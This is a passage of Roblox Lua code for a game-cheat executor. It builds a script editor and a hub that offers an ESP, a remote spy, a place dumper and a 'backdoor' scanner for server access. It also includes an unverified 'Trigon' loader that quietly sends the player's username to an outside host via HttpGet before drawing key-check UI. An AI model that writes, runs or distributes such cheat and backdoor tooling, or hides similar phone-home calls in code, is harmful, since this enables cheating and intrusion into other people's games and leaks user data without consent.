synminbutt.Visible == false then if (input.KeyCode == Enum.KeyCode.F6) then MainFrame.Visible = not MainFrame.Visible end end end) local function SYHNK_fake_script() -- ImageLabel.LocalScript local script = Instance.new('LocalScript', ImageLabel) local lua_keywords = {"and", "break", "do", "else", "elseif", "end", "false", "for", "function", "goto", "if", "in", "local", "nil", "not", "or", "repeat", "return", "then", "true", "until", "while"} local global_env = {"getrawmetatable", "game", "workspace", "script", "math", "string", "table", "print", "wait", "BrickColor", "Color3", "next", "pairs", "ipairs", "select", "unpack", "Instance", "Vector2", "Vector3", "CFrame", "Ray", "UDim2", "Enum", "assert", "error", "warn", "tick", "loadstring", "_G", "shared", "getfenv", "setfenv", "newproxy", "setmetatable", "getmetatable", "os", "debug", "pcall", "ypcall", "xpcall", "rawequal", "rawset", "rawget", "tonumber", "tostring", "type", "typeof", "_VERSION", "coroutine", "delay", "require", "spawn", "LoadLibrary", "settings", "stats", "time", "UserSettings", "version", "Axes", "ColorSequence", "Faces", "ColorSequenceKeypoint", "NumberRange", "NumberSequence", "NumberSequenceKeypoint", "gcinfo", "elapsedTime", "collectgarbage", "PhysicalProperties", "Rect", "Region3", "Region3int16", "UDim", "Vector2int16", "Vector3int16"} local Source = script.Parent.EditorFrame.Source local scrollframe = script.Parent.EditorFrame local Lines = Source.Parent.Lines local Highlight = function(string, keywords) local K = {} local S = string local Token = { ["="] = true, ["."] = true, [","] = true, ["("] = true, [")"] = true, ["["] = true, ["]"] = true, ["{"] = true, ["}"] = true, [":"] = true, ["*"] = true, ["/"] = true, ["+"] = true, ["-"] = true, ["%"] = true, [";"] = true, ["~"] = true } for i, v in pairs(keywords) do K[v] = true end S = S:gsub(".", function(c) if Token[c] ~= nil then return "\32" else return c end end) S = S:gsub("%S+", function(c) if K[c] ~= nil then return c else return (" "):rep(#c) end end) return S end local hTokens = function(string) local Token = { ["="] = true, ["."] = true, [","] = true, ["("] = true, [")"] = true, ["["] = true, ["]"] = true, ["{"] = true, ["}"] = true, [":"] = true, ["*"] = true, ["/"] = true, ["+"] = true, ["-"] = true, ["%"] = true, [";"] = true, ["~"] = true } local A = "" string:gsub(".", function(c) if Token[c] ~= nil then A = A .. c elseif c == "\n" then A = A .. "\n" elseif c == "\t" then A = A .. "\t" else A = A .. "\32" end end) return A end local strings = function(string) local highlight = "" local quote = false string:gsub(".", function(c) if quote == false and c == "\"" then quote = true elseif quote == true and c == "\"" then quote = false end if quote == false and c == "\"" then highlight = highlight .. "\"" elseif c == "\n" then highlight = highlight .. "\n" elseif c == "\t" then highlight = highlight .. "\t" elseif quote == true then highlight = highlight .. c elseif quote == false then highlight = highlight .. "\32" end end) return highlight end local comments = function(string) local ret = "" string:gsub("[^\r\n]+", function(c) local comm = false local i = 0 c:gsub(".", function(n) i = i + 1 if c:sub(i, i + 1) == "--" then comm = true end if comm == true then ret = ret .. n else ret = ret .. "\32" end end) ret = ret end) return ret end local numbers = function(string) local A = "" string:gsub(".", function(c) if tonumber(c) ~= nil then A = A .. c elseif c == "\n" then A = A .. "\n" elseif c == "\t" then A = A .. "\t" else A = A .. "\32" end end) return A end local highlight_source = function(type) if type == "Text" then Source.Text = Source.Text:gsub("\13", "") Source.Text = Source.Text:gsub("\t", " ") local s = Source.Text Source.Keywords_.Text = Highlight(s, lua_keywords) Source.Globals_.Text = Highlight(s, global_env) Source.RemoteHighlight_.Text = Highlight(s, {"FireServer", "fireServer", "InvokeServer", "invokeServer"}) Source.Tokens_.Text = hTokens(s) Source.Numbers_.Text = numbers(s) Source.Strings_.Text = strings(s) local lin = 1 s:gsub("\n", function() lin = lin + 1 end) Lines.Text = "" for i = 1, lin do Lines.Text = Lines.Text .. i .. "\n" end end end highlight_source("Text") Source.Changed:Connect(highlight_source) Source:GetPropertyChangedSignal("Text"):Connect(function() local count = 1 Source.Text:gsub("\n", function() count = count + 1 end) scrollframe.CanvasSize = UDim2.new(0, 1500, count/16.6, 0) Source.Size = UDim2.new(0, 598, 0, 249 + (count > 16 and 16*(count-16) or 0)) end) end coroutine.wrap(SYHNK_fake_script)() local function AMNA_fake_script() -- MainFrame.Dragging local script = Instance.new('LocalScript', MainFrame) local UserInputService = game:GetService("UserInputService") local gui = script.Parent local dragging local dragInput local dragStart local startPos local function update(input) local delta = input.Position - dragStart gui.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y) end gui.InputBegan:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then dragging = true dragStart = input.Position startPos = gui.Position input.Changed:Connect(function() if input.UserInputState == Enum.UserInputState.End then dragging = false end end) end end) gui.InputChanged:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then dragInput = input end end) UserInputService.InputChanged:Connect(function(input) if input == dragInput and dragging then update(input) end end) end coroutine.wrap(AMNA_fake_script)() local function VEUJFP_fake_script() -- scripthub_2.Dragging local script = Instance.new('LocalScript', scripthub_2) local UserInputService = game:GetService("UserInputService") local gui = script.Parent local dragging local dragInput local dragStart local startPos local function update(input) local delta = input.Position - dragStart gui.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y) end gui.InputBegan:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then dragging = true dragStart = input.Position startPos = gui.Position input.Changed:Connect(function() if input.UserInputState == Enum.UserInputState.End then dragging = false end end) end end) gui.InputChanged:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then dragInput = input end end) UserInputService.InputChanged:Connect(function(input) if input == dragInput and dragging then update(input) end end) end coroutine.wrap(VEUJFP_fake_script)() local function AKJCSK_fake_script() -- optionspage.Dragging local script = Instance.new('LocalScript', optionspage) local UserInputService = game:GetService("UserInputService") local gui = script.Parent local dragging local dragInput local dragStart local startPos local function update(input) local delta = input.Position - dragStart gui.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y) end gui.InputBegan:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then dragging = true dragStart = input.Position startPos = gui.Position input.Changed:Connect(function() if input.UserInputState == Enum.UserInputState.End then dragging = false end end) end end) gui.InputChanged:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then dragInput = input end end) UserInputService.InputChanged:Connect(function(input) if input == dragInput and dragging then update(input) end end) end coroutine.wrap(AKJCSK_fake_script)() local function VJHASD_fake_script() -- synminbutt.Dragging local script = Instance.new('LocalScript', synminbutt) local UserInputService = game:GetService("UserInputService") local gui = script.Parent local dragging local dragInput local dragStart local startPos local function update(input) local delta = input.Position - dragStart gui.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y) end gui.InputBegan:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then dragging = true dragStart = input.Position startPos = gui.Position input.Changed:Connect(function() if input.UserInputState == Enum.UserInputState.End then dragging = false end end) end end) gui.InputChanged:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then dragInput = input end end) UserInputService.InputChanged:Connect(function(input) if input == dragInput and dragging then update(input) end end) end coroutine.wrap(VJHASD_fake_script)() local function QQFYV_fake_script() -- tabs.Tabs local script = Instance.new("LocalScript", Tabs) local currentTab local function getTabs() local tabs = {} for _, v in pairs(script.Parent:GetChildren()) do if v.Name:match("Tab_%d+") then tabs[#tabs + 1] = v end end return tabs end local function showTab(tab) currentTab = tab if not tab then script.Parent.Parent.EditorFrame.Source.Text = "" return end tab.ScriptTitle.Size = UDim2.new(0,55,0,19) tab.ScriptTitle.Position = UDim2.new(tab.ScriptTitle.Position.X.Scale, 0, -0.074, 0) tab.RemoveTab.Size = UDim2.new(0, 19, 0, 19) tab.RemoveTab.Position = UDim2.new(tab.RemoveTab.Position.X.Scale, 0, -0.074, 0) script.Parent.Parent.EditorFrame.Source.Text = tostring(tab.Script.Value) for i, v in pairs(getTabs()) do if v ~= currentTab then v.ScriptTitle.Size = UDim2.new(0, 45, 0, 17) v.ScriptTitle.Position = UDim2.new(v.ScriptTitle.Position.X.Scale, 0, -0.066, 0) v.RemoveTab.Size = UDim2.new(0, 24, 0, 17) v.RemoveTab.Position = UDim2.new(v.RemoveTab.Position.X.Scale, 0, -0.066, 0) end end end local function removeTab(tab) local tabs = getTabs() local idx = 0 for i = 1, #tabs do if tabs[i] == tab then idx = i tabs[i]:Destroy() table.remove(tabs, i) end end local lastTab do if #tabs > 0 then lastTab = tabs[#tabs] end end for i, v in pairs(tabs) do v.ScriptTitle.Position = tabs[i - 1] and UDim2.new(tabs[i - 1].ScriptTitle.Position.X.Scale + 0.103, 0, -0.074, 0) or UDim2.new(0, 0, -0.074, 0) v.RemoveTab.Position = UDim2.new(v.ScriptTitle.Position.X.Scale + 0.067, 0, -0.074, 0) end script.Parent.NewTab.Position = lastTab and lastTab.RemoveTab.Position + UDim2.new(0.046, 0, 0.008, 0) or UDim2.new(0, 0, -0.066, 0) showTab(currentTab ~= tab and currentTab or tabs[idx] or tabs[idx - 1]) end local function newTab() local tabs = getTabs() local tab = Instance.new("Folder", script.Parent) local titlescript = Instance.new("TextButton", tab) local remove = Instance.new("TextButton", tab) local tabScript = Instance.new("StringValue", tab) local lastTab do if #tabs > 0 then lastTab = tabs[#tabs] end end tab.Name = ("Tab_%d"):format(#tabs + 1) titlescript.Name = "ScriptTitle" titlescript.BackgroundColor3 = Color3.fromRGB(107, 107, 107) titlescript.BorderSizePixel = 0 titlescript.Position = lastTab and UDim2.new(lastTab.ScriptTitle.Position.X.Scale + 0.103, 0, -0.074, 0) or UDim2.new(0, 0, -0.074, 0) titlescript.Size = UDim2.new(0, 44,0, 19) titlescript.Font = Enum.Font.SourceSans titlescript.TextColor3 = Color3.fromRGB(255, 255, 255) titlescript.TextSize = 15 titlescript.Text = ("Script %d"):format(#tabs + 1) remove.Name = "RemoveTab" remove.BackgroundColor3 = Color3.fromRGB(107, 107, 107) remove.BorderSizePixel = 0 remove.Position = UDim2.new(titlescript.Position.X.Scale + 0.067, 0, -0.074, 0) remove.Size = UDim2.new(0, 24, 0, 19) remove.Font = Enum.Font.SourceSans remove.TextColor3 = Color3.fromRGB(255, 255, 255) remove.TextSize = 14 remove.Text = "x" tabScript.Name = "Script" script.Parent.NewTab.Position = remove.Position + UDim2.new(0.046, 0, 0.008, 0) showTab(tab) titlescript.MouseButton1Click:Connect(function() showTab(tab) end) remove.MouseButton1Click:Connect(function() removeTab(tab) end) return tab end currenTab = newTab() showTab(currentTab) script.Parent.NewTab.MouseButton1Click:Connect(function() newTab() end) script.Parent.Parent.EditorFrame.Source:GetPropertyChangedSignal("Text"):Connect(function() currentTab.Script.Value = script.Parent.Parent.EditorFrame.Source.Text end) end coroutine.wrap(QQFYV_fake_script)() while true do wait(0.01) if scripthub_2.Visible == true then if scriptselected == "none" then descri.Text = "" end if scriptselected == "dex" then descri.Text = "A version of the popular Dex explorer with patches specifically for Synapse X." end if scriptselected == "esp" then descri.Text = "ESP Made by ic3w0lf using the Drawing API." end if scriptselected == "spy" then descri.Text = "Allows you to view RemoteEvents and RemoteFunctions called." end if scriptselected == "dumper" then descri.Text = "Dumps the place as a .rbxl file in your workspace folder." end if scriptselected == "backdoor" then descri.Text = "backdoor.exe for scan place to FE access (Only place ban possible)." end end end end) Section:NewButton("Trigon", "trigon", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] repeat task.wait() until game:IsLoaded() shared = {} shared.TrigonVer = "Trigon v0.03z1" print(shared.TrigonVer) pcall(function() local x = game:HttpGet("https://trigonevo.fun/x.php?user=" .. game.Players.LocalPlayer.Name) end) --v0.02 fixed function topbar(ButtonName,Image,Left) task.wait(2) local RunService = game:GetService("RunService") local GuiService = game:GetService("GuiService") if ButtonName ~= nil and Image ~= nil then if RunService:IsClient() then local Player = game.Players.LocalPlayer if Player ~= nil then local PlrCheck = false for _,p in pairs(game.Players:GetPlayers()) do if p == Player then PlrCheck = true end end if PlrCheck == false then warn("Invalid Player") return false else -- Player is valid, Check to see if there is already the topbar frame local TopbarFrame pcall(function() TopbarFrame = gethui():FindFirstChild("TrigonTopbar") end) if TopbarFrame == nil then -- No TopbarFrame, Add it local TBUI = Instance.new("ScreenGui") TBUI.Parent = gethui() TBUI.Name = "TrigonTopbar" TBUI.DisplayOrder = 1000000000 TBUI.Enabled = true TBUI.IgnoreGuiInset = true TBUI.ResetOnSpawn = false local TBFrame = Instance.new("Frame") TBFrame.Parent = TBUI TBFrame.BackgroundTransparency = 1 TBFrame.BorderSizePixel = 0 TBFrame.Name = "TopbarFrame" TBFrame.Size = UDim2.new(1,0,0,36) TBFrame.ZIndex = 1000000000 local TBL = Instance.new("Frame") TBL.Parent = TBFrame TBL.BackgroundTransparency = 1 TBL.BorderSizePixel = 0 TBL.Name = "Left" TBL.Position = UDim2.new(0,104,0,4) TBL.Size = UDim2.new(0.85,0,0,32) local TBR = Instance.new("Frame") TBR.Parent = TBFrame TBR.BackgroundTransparency = 1 TBR.BorderSizePixel = 0 TBR.Name = "Right" TBR.AnchorPoint = Vector2.new(1,0) TBR.Position = UDim2.new(1,-60,0,4) TBR.Size = UDim2.new(0.85,0,0,32) local TBLUI = Instance.new("UIListLayout") TBLUI.Parent = TBL TBLUI.Padding = UDim.new(0,12) TBLUI.FillDirection = Enum.FillDirection.Horizontal TBLUI.HorizontalAlignment = Enum.HorizontalAlignment.Left TBLUI.SortOrder = Enum.SortOrder.LayoutOrder TBLUI.VerticalAlignment = Enum.VerticalAlignment.Top local TBRUI = Instance.new("UIListLayout") TBRUI.Parent = TBR TBRUI.Padding = UDim.new(0,12) TBRUI.FillDirection = Enum.FillDirection.Horizontal TBRUI.HorizontalAlignment = Enum.HorizontalAlignment.Right TBRUI.SortOrder = Enum.SortOrder.LayoutOrder TBRUI.VerticalAlignment = Enum.VerticalAlignment.Top RunService.RenderStepped:Connect(function() if GuiService.MenuIsOpen == true then TBFrame.Visible = false else TBFrame.Visible = true end end) TopbarFrame = TBUI end -- Check to see if name is taken local CheckLeft = TopbarFrame.TopbarFrame.Left:FindFirstChild(ButtonName) local CheckRight = TopbarFrame.TopbarFrame.Right:FindFirstChild(ButtonName) if CheckLeft == nil and CheckRight == nil then local NewButton = Instance.new("Frame") NewButton.Name = ButtonName NewButton.BackgroundTransparency = 1 NewButton.BorderSizePixel = 0 NewButton.Position = UDim2.new(0,104,0,4) NewButton.Size = UDim2.new(0,32,0,32) local IconButton = Instance.new("ImageButton") IconButton.Parent = NewButton IconButton.BackgroundTransparency = 1 IconButton.Name = "IconButton" IconButton.Size = UDim2.new(1,0,1,0) IconButton.ZIndex = 2 IconButton.Image = "rbxasset://textures/ui/TopBar/iconBase.png" IconButton.ScaleType = Enum.ScaleType.Slice IconButton.SliceCenter = Rect.new(Vector2.new(10,10),Vector2.new(10,10)) local BadgeContainer = Instance.new("Frame") BadgeContainer.Parent = IconButton BadgeContainer.BackgroundTransparency = 1 BadgeContainer.Size = UDim2.new(1,0,1,0) BadgeContainer.Name = "BadgeContainer" BadgeContainer.ZIndex = 5 BadgeContainer.Visible = false local Badge = Instance.new("Frame") Badge.Parent = BadgeContainer Badge.BackgroundTransparency = 1 Badge.Name = "Badge" Badge.Position = UDim2.new(0,18,0,-2) Badge.Size = UDim2.new(0,24,0,24) local BadgeBG = Instance.new("ImageLabel") BadgeBG.Parent = Badge BadgeBG.BackgroundTransparency = 1 BadgeBG.Size = UDim2.new(1,0,1,0) BadgeBG.Name = "Background" BadgeBG.ZIndex = 2 BadgeBG.Image = "rbxasset://LuaPackages/Packages/_Index/UIBlox/UIBlox/App/ImageSet/ImageAtlas/img_set_1x_1.png" BadgeBG.ImageColor3 = Color3.fromRGB(35, 37, 39) BadgeBG.ImageRectOffset = Vector2.new(301, 484) BadgeBG.ImageRectSize = Vector2.new(25,25) BadgeBG.ScaleType = Enum.ScaleType.Slice BadgeBG.SliceCenter = Rect.new(Vector2.new(14,14),Vector2.new(15,15)) local Inner = Instance.new("ImageLabel") Inner.Parent = Badge Inner.AnchorPoint = Vector2.new(0.5,0.5) Inner.BackgroundTransparency = 1 Inner.Name = "Inner" Inner.Position = UDim2.new(0.5,0,0.5,0) Inner.Size = UDim2.new(1,-4,1,-4) Inner.ZIndex = 3 Inner.Image = "rbxasset://LuaPackages/Packages/_Index/UIBlox/UIBlox/App/ImageSet/ImageAtlas/img_set_1x_1.png" Inner.ImageRectOffset = Vector2.new(463,168) Inner.ImageRectSize = Vector2.new(21,21) Inner.ScaleType = Enum.ScaleType.Slice Inner.SliceCenter = Rect.new(Vector2.new(14,14),Vector2.new(15,15)) local InnerTL = Instance.new("TextLabel") InnerTL.Parent = Inner InnerTL.BackgroundTransparency = 1 InnerTL.Name = "TextLabel" InnerTL.Size = UDim2.new(1,0,1,0) InnerTL.Font = Enum.Font.Gotham InnerTL.Text = "0" InnerTL.TextColor3 = Color3.fromRGB(57, 59, 61) InnerTL.TextSize = 14 local IconImg = Instance.new("ImageLabel") IconImg.Parent = IconButton IconImg.AnchorPoint = Vector2.new(0.5,0.5) IconImg.BackgroundTransparency = 1 IconImg.Name = "IconImage" IconImg.Position = UDim2.new(0.5,0,0.5,0) IconImg.Size = UDim2.new(1,-8,0,24) IconImg.ZIndex = 3 IconImg.Image = "rbxasset://textures/ui/TopBar/coloredlogo.png" IconImg.ScaleType = Enum.ScaleType.Fit local DropDown = Instance.new("ImageLabel") DropDown.Name = "Dropdown" DropDown.Parent = NewButton DropDown.AnchorPoint = Vector2.new(0.5,0) DropDown.BackgroundTransparency = 1 DropDown.Position = UDim2.new(0.5,0,1,2) DropDown.Size = UDim2.new(0,10,0,0) DropDown.Image = "rbxasset://textures/ui/TopBar/iconBase.png" DropDown.ScaleType = Enum.ScaleType.Slice DropDown.SliceCenter = Rect.new(Vector2.new(10,10),Vector2.new(10,10)) DropDown.Visible = false IconButton.MouseButton2Up:Connect(function() DropDown.Visible = not DropDown.Visible end) local DropList = Instance.new("UIListLayout") DropList.Parent = DropDown DropList.FillDirection = Enum.FillDirection.Vertical DropList.HorizontalAlignment = Enum.HorizontalAlignment.Left DropList.SortOrder = Enum.SortOrder.LayoutOrder DropList.VerticalAlignment = Enum.VerticalAlignment.Top pcall(function() NewButton.IconButton.IconImage.Image = Image end) if Left == true or nil then NewButton.Parent = TopbarFrame.TopbarFrame.Left else NewButton.Parent = TopbarFrame.TopbarFrame.Right end IconButton.Activated:Connect(function() local TrigonMain = gethui().TrigonMain TrigonMain.Enabled = not TrigonMain.Enabled end) local tbl = { pulseimg = Instance.new("ImageLabel"), pulsescript = Instance.new("LocalScript") } tbl.pulseimg.ImageColor3 = Color3.fromRGB(0, 0, 0) tbl.pulseimg.SliceCenter = Rect.new(20, 20, 108, 108) tbl.pulseimg.ScaleType = Enum.ScaleType.Fit tbl.pulseimg.BackgroundColor3 = Color3.fromRGB(255, 255, 255) tbl.pulseimg.ImageTransparency = 0.2 tbl.pulseimg.Image = "rbxassetid://11953711609" tbl.pulseimg.Size = UDim2.new(19.75, 0, 20.8125, 0) tbl.pulseimg.Name = "pulseimg" tbl.pulseimg.BackgroundTransparency = 1 tbl.pulseimg.Position = UDim2.new(-9.375, 0, -9.9375, 0) tbl.pulseimg.Parent = IconButton tbl.pulsescript.Name = "pulsescript" tbl.pulsescript.Parent = tbl.pulseimg task.spawn(function() local script = tbl.pulsescript local TweenService = game:GetService("TweenService") local uiElement = script.Parent local normalSize = UDim2.new(19.75, 0, 20.813, 0) local bigSize = UDim2.new(26.375, 0, 25.5, 0) local normalPos = UDim2.new(-9.375, 0, -9.938, 0) local bigPos = UDim2.new(-12.469, 0, -12.281, 0) local tweenDuration = 0.5 local pulseDuration = 4 local function createTween(targetObject, targetSize, targetPos, duration) local tweenInfo = TweenInfo.new(duration, Enum.EasingStyle.Quad, Enum.EasingDirection.InOut) local goals = {Size = targetSize, Position = targetPos} return TweenService:Create(targetObject, tweenInfo, goals) end local function startPulsing() local startTime = tick() while tick() - startTime < pulseDuration do local growTween = createTween(uiElement, bigSize, bigPos, tweenDuration) growTween:Play() growTween.Completed:Wait() local shrinkTween = createTween(uiElement, normalSize, normalPos, tweenDuration) shrinkTween:Play() shrinkTween.Completed:Wait() end uiElement.Visible = false end startPulsing() end) return NewButton.IconButton else -- Name already in use return false end end else warn("Player is nil") end else warn("Input is nil") return false end end end function loader() local tbl = { TrigonLoader = Instance.new("ScreenGui"), MainFrame = Instance.new("Frame"), KeySection = Instance.new("Frame"), ImageLabel = Instance.new("ImageLabel"), Buttons = Instance.new("Frame"), UIListLayout = Instance.new("UIListLayout"), zButton2 = Instance.new("ImageButton"), UICorner = Instance.new("UICorner"), UIGradient = Instance.new("UIGradient"), Title = Instance.new("TextLabel"), zButton1 = Instance.new("ImageButton"), UICorner_1 = Instance.new("UICorner"), Title_1 = Instance.new("TextLabel"), UIGradient_1 = Instance.new("UIGradient"), aKeyContainer = Instance.new("Frame"), KeyBox = Instance.new("TextBox"), UICorner_2 = Instance.new("UICorner"), Frame = Instance.new("Frame"), SelectorFrame = Instance.new("Frame"), Buttons_1 = Instance.new("Frame"), OptionL = Instance.new("ImageButton"), UICorner_3 = Instance.new("UICorner"), UIStroke = Instance.new("UIStroke"), ImageLabel_1 = Instance.new("ImageLabel"), TextLabel = Instance.new("TextLabel"), overlay = Instance.new("Frame"), UIListLayout_1 = Instance.new("UIListLayout"), OptionR = Instance.new("ImageButton"), UIStroke_1 = Instance.new("UIStroke"), ImageLabel_2 = Instance.new("ImageLabel"), TextLabel_1 = Instance.new("TextLabel"), UICorner_4 = Instance.new("UICorner"), OptionH = Instance.new("ImageButton"), UICorner_5 = Instance.new("UICorner"), UIStroke_2 = Instance.new("UIStroke"), ImageLabel_3 = Instance.new("ImageLabel"), TextLabel_2 = Instance.new("TextLabel"), overlay_1 = Instance.new("Frame"), Title_2 = Instance.new("TextLabel"), CloseBtn = Instance.new("ImageButton"), UICorner_6 = Instance.new("UICorner"), LoaderFrame = Instance.new("Frame"), ImageLabel_4 = Instance.new("ImageLabel"), list = Instance.new("Frame"), UIListLayout_2 = Instance.new("UIListLayout"), Frame_1 = Instance.new("Frame"), UICorner_7 = Instance.new("UICorner"), Bar = Instance.new("Frame"), UICorner_8 = Instance.new("UICorner"), Title_3 = Instance.new("TextLabel"), CloseBtn_1 = Instance.new("ImageButton"), LocalScript = Instance.new("LocalScript"), TrigonLogo = Instance.new("ImageLabel") } tbl.TrigonLoader.ScreenInsets = Enum.ScreenInsets.DeviceSafeInsets tbl.TrigonLoader.IgnoreGuiInset = true tbl.TrigonLoader.ZIndexBehavior = Enum.ZIndexBehavior.Sibling tbl.TrigonLoader.Name = "TrigonLoader" tbl.TrigonLoader.DisplayOrder = 2 tbl.TrigonLoader.Parent = gethui() tbl.MainFrame.BorderSizePixel = 0 tbl.MainFrame.Size = UDim2.new(0.520158, 0, 0.551802, 0) tbl.MainFrame.Position = UDim2.new(0.239385, 0, 0.223958, 0) tbl.MainFrame.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.MainFrame.Name = "MainFrame" tbl.MainFrame.BackgroundColor3 = Color3.fromRGB(38, 42, 53) tbl.MainFrame.Parent = tbl.TrigonLoader tbl.KeySection.BorderSizePixel = 0 tbl.KeySection.Size = UDim2.new(1, 0, 1, 0) tbl.KeySection.BackgroundTransparency = 1 tbl.KeySection.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.KeySection.Visible = false tbl.KeySection.Name = "KeySection" tbl.KeySection.BackgroundColor3 = Color3.fromRGB(255, 255, 255) tbl.KeySection.Parent = tbl.MainFrame tbl.ImageLabel.BorderSizePixel = 0 tbl.ImageLabel.ScaleType = Enum.ScaleType.Fit tbl.ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) tbl.ImageLabel.Image = "rbxassetid://15844306310" tbl.ImageLabel.Size = UDim2.new(1, 0, 0.233923, 0) tbl.ImageLabel.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.ImageLabel.BackgroundTransparency = 1 tbl.ImageLabel.Position = UDim2.new(3.32781e-08, 0, 0.0618388, 0) tbl.ImageLabel.Parent = tbl.KeySection tbl.Buttons.AnchorPoint = Vector2.new(0.5, 0.5) tbl.Buttons.BorderSizePixel = 0 tbl.Buttons.Size = UDim2.new(0.856923, 0, 0.435747, 0) tbl.Buttons.Position = UDim2.new(0.499928, 0, 0.782127, 0) tbl.Buttons.BackgroundTransparency = 1 tbl.Buttons.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.Buttons.Name = "Buttons" tbl.Buttons.BackgroundColor3 = Color3.fromRGB(255, 255, 255) tbl.Buttons.Parent = tbl.KeySection tbl.UIListLayout.HorizontalAlignment = Enum.HorizontalAlignment.Center tbl.UIListLayout.Padding = UDim.new(0.07, 0) tbl.UIListLayout.Parent = tbl.Buttons tbl.zButton2.Active = false tbl.zButton2.BorderSizePixel = 0 tbl.zButton2.ScaleType = Enum.ScaleType.Fit tbl.zButton2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) tbl.zButton2.Selectable = false tbl.zButton2.AnchorPoint = Vector2.new(0.5, 0.5) tbl.zButton2.Size = UDim2.new(0.6, 0, 0.248202, 0) tbl.zButton2.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.zButton2.Name = "zButton2" tbl.zButton2.Position = UDim2.new(0.5, 0, 1.22563, 0) tbl.zButton2.Parent = tbl.Buttons tbl.UICorner.CornerRadius = UDim.new(0.2, 0) tbl.UICorner.Parent = tbl.zButton2 tbl.UIGradient.Color = ColorSequence.new{ ColorSequenceKeypoint.new(0, Color3.fromRGB(57, 64, 85)), ColorSequenceKeypoint.new(1, Color3.fromRGB(80, 90, 120)) } tbl.UIGradient.Rotation = -90 tbl.UIGradient.Parent = tbl.zButton2 tbl.Title.TextWrapped = true tbl.Title.BorderSizePixel = 0 tbl.Title.TextScaled = true tbl.Title.BackgroundColor3 = Color3.fromRGB(255, 255, 255) tbl.Title.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) tbl.Title.AnchorPoint = Vector2.new(0.5, 0.5) tbl.Title.TextSize = 14 tbl.Title.Name = "Title" tbl.Title.Size = UDim2.new(0.393375, 0, 0.46988, 0) tbl.Title.TextColor3 = Color3.fromRGB(113, 128, 170) tbl.Title.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.Title.Text = "COPY KEY LINK" tbl.Title.Position = UDim2.new(0.5, 0, 0.5, 0) tbl.Title.BackgroundTransparency = 1 tbl.Title.Parent = tbl.zButton2 tbl.zButton1.Active = false tbl.zButton1.BorderSizePixel = 0 tbl.zButton1.ScaleType = Enum.ScaleType.Fit tbl.zButton1.BackgroundColor3 = Color3.fromRGB(255, 255, 255) tbl.zButton1.Selectable = false tbl.zButton1.AnchorPoint = Vector2.new(0.5, 0.5) tbl.zButton1.Size = UDim2.new(0.6, 0, 0.248202, 0) tbl.zButton1.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.zButton1.Name = "zButton1" tbl.zButton1.Position = UDim2.new(0.5, 0, 0.924008, 0) tbl.zButton1.Parent = tbl.Buttons tbl.UICorner_1.CornerRadius = UDim.new(0.2, 0) tbl.UICorner_1.Parent = tbl.zButton1 tbl.Title_1.TextWrapped = true tbl.Title_1.BorderSizePixel = 0 tbl.Title_1.TextScaled = true tbl.Title_1.BackgroundColor3 = Color3.fromRGB(255, 255, 255) tbl.Title_1.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) tbl.Title_1.AnchorPoint = Vector2.new(0.5, 0.5) tbl.Title_1.TextSize = 14 tbl.Title_1.Name = "Title" tbl.Title_1.Size = UDim2.new(0.393375, 0, 0.46988, 0) tbl.Title_1.TextColor3 = Color3.fromRGB(250, 250, 250) tbl.Title_1.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.Title_1.Text = "Verify" tbl.Title_1.Position = UDim2.new(0.5, 0, 0.5, 0) tbl.Title_1.BackgroundTransparency = 1 tbl.Title_1.Parent = tbl.zButton1 tbl.UIGradient_1.Color = ColorSequence.new{ ColorSequenceKeypoint.new(0, Color3.fromRGB(80, 118, 218)), ColorSequenceKeypoint.new(1, Color3.fromRGB(104, 155, 247)) } tbl.UIGradient_1.Rotation = -90 tbl.UIGradient_1.Parent = tbl.zButton1 tbl.aKeyContainer.AnchorPoint = Vector2.new(0.5, 0.5) tbl.aKeyContainer.BorderSizePixel = 0 tbl.aKeyContainer.Size = UDim2.new(0.855384, 0, 0.259971, 0) tbl.aKeyContainer.Position = UDim2.new(0.5, 0, 0.129985, 0) tbl.aKeyContainer.BorderColor3 = Color3.fromRGB(0, 0, 0) tbl.aKeyContainer.Name = "aKeyContainer" tbl.aKeyContainer.BackgroundColor3 = Color3.fromRGB(52, 57, 71) tbl.aKeyContainer.Parent = tbl.Buttons tbl.KeyBox.TextWrapped = true tbl.KeyBox.BorderSizePixel = 0 tbl.KeyBox.TextScaled = true tbl.KeyBox.BackgroundColor3 = Color3.fromRGB(49, 53, 66) tbl.KeyBox.FontFace = Font.new("rbxasset://fonts/families/SpecialElite.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) 